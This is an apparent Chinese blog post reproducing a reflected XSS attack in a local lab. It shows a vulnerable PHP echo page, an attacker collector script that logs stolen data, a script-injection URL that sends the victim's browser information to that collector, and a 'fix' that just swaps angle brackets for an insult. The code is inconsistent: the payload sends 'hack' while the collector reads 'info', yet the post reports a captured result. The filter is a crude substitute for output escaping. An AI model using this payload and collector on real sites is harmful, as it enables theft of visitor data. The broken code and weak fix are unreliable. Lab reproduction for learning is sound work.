反射型 XSS 原理復現
阿新 • • 發佈:2020-12-24
反射型 XSS 復現記錄
整個漏洞含有三個實體:
- 攻擊者
- 受害者
- 網頁伺服器:
http://192.168.64.2/index.php
製作漏洞
網頁伺服器程式碼:
<?php
echo $_GET['xss'];
?>
利用漏洞
攻擊者漏洞利用流程:
- 構造含有 XSS 程式碼的 URL
- 受害者執行 URL
- XSS 程式碼在受害者瀏覽器上執行,獲取資訊
- XSS 程式碼將獲取的資訊傳送給攻擊者
攻擊者接收 XSS 程式碼傳來的資訊:http://192.168.64.2/hack.php
<?php $file = fopen('資訊.txt','w'); fwrite($file,$_GET['info']); ?>
攻擊者構建的 URL :
http://192.168.64.2/?xss=
<script> window.location.href='http://192.168.64.2/hack.php?hack=' %2B navigator.platform </script>
受害者訪問 URL 之後,資訊.txt
的內容
MacIntel
修復漏洞
網頁伺服器程式碼:
<?php $safe1 = str_replace('>','臭不要臉,黑老子站',$_GET['xss']); $safe = str_replace('<','臭不要臉,黑老子站',$safe1); echo $safe; ?>